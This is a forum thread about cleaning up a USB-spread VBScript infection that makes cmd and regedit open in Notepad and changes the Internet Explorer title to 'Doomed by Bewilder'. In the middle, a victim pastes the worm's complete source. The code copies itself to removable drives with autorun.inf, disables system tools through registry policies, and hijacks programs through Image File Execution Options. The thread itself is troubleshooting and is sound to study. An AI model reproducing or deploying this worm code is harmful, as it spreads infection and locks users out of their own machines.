CMD and REGEDIT opens with notepad!

**nailv**

hi,

how can i remove the changes caused by a virus? something with a double extension, *.dll.vbs??

i used the RRT and it removed the restrictions on run, task manager & folder options but CMD and regedit still opens with notepad!

i wonder i updated my mcafee run a full scan on the flash drive i have inserted but it found nothing.

my pc was infected right after i removed the flash drive from my computer.

**Raymond**

Did you install the script from this article?
http://www.raymond.cc/blog/archives/2007/07/01/stop-virus-from-running-automatically-when-you-execute-files/

It should fix .bat, .com, .exe, .pif, .reg and .scr file. It will also re-enable your registry editor (regedit).

Looks like you have an infected usb flash drive. Make sure you clean the virus in your usb flash drive first.

**nailv**

yes, i did. i copied the script from the page, paste it on notepad and saved it on my desktop then i right clicked it then clicked "install". i also restarted my pc.

but how come it is still the same? Nothing happens.
regedit.exe and cmd still opens with notepad. damn.

i also run the RRT.

**Raymond**

If the problem still comes back after restart, I suspect that there is still virus on your computer that's causing it.

You can do this to verify.
Install the script again. Then run regedit and go to the location:
HKLM, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKLM, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe ""%1"""
HKLM, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"

Check if the value is "%1" %*. If it's correct, restart.
Once your computer is booted up, run regedit again and check the values.

**nailv**

It is STILL THE SAME.... even if i run into safe mode and installed the script again.
I still cannot open the registry, command prompt and msconfig.

i restarted my pc many times to no avail. i already removed vbscript file type in the folder options.

also, IE's title bar has a phrase, "Doomed by Bewilder".

I DONT want to reformat my pc. Pls help me out...

**nailv**

this is the script of the virus:

Code:

'Sting C

on error resume next

dim winpath,mysource,fs,atr,flashdrive,check,mf,tf,rg,nt,sd

atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe wpzcon32.dll.vbs"

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

do

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")

tf.attributes = 32

set tf=fs.createtextfile(winpath & "\wpzcon32.dll.vbs",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & "\wpzcon32.dll.vbs")

tf.attributes = 39

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")

tf.attributes =32

set tf=fs.createtextfile(flashdrive.path &"\wpzcon32.dll.vbs",2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &"\wpzcon32.dll.vbs")

tf.attributes =39

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes=39

end if

next

set rg = createobject("WScript.Shell")

rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WPZCON32",winpath&"\wpzcon32.dll.vbs"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Doomed by Bewilder"

rg.regwrite "HKEY_CURRENT_USER\vbsfile\DefaultIcon","shell32.dll,2"

rg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon","shell32.dll,2"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden","0","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"

rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Don't Worry... Be Happy..."

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Bewilder"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeCaption","Bewilder"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\LegalNoticeText","Doomed by Bewilder"

if check <> 1 then

Wscript.sleep 200000

end if

loop while check<>1

set sd = createobject("Wscript.shell")

sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

**Raymond**

Why can't I find any information about this Bewilder virus?
nailv, may I know where did you get that code from?

**nailv**

i found it from C: of my collegue's PC. The virus was actually from removable flash drives.

i think every usb flash drive is dwelled by viruses usually written in vbscripts.
damn.

Edit: wheww! at last! i've fix it already.

thankz to expert folks on other forums.

**CloudJay**

hi raymond. I think i have the same problem with my laptop :( . The title bar on my internet explorer has a doomed by bewilder thing. And the note pad thing too. Ive already fix the task manager. Pls help me, i am desparately needing your help Raymond cause im a noob in computers. i cannot understand those complicated instructions that you have already given to fix my problems. What should I do? Pls help me by instructing me step by step what to do. Thanks Raymond :)

**brayden**

try downloading winsecret from the freebies giverway topic in latest releases and when you have fininshed downloading it you run it go to applications and you can change the title in internet explorer

Thread: CMD and REGEDIT opens with notepad!

LinkBack

Thread Tools

Similar Threads

Mini Regedit

.Dll Opens With Notepad

Hijack.Regedit

Guys please help me about Disabled regedit and ctrl + alt + del

Some applications(.exe) opens with notepad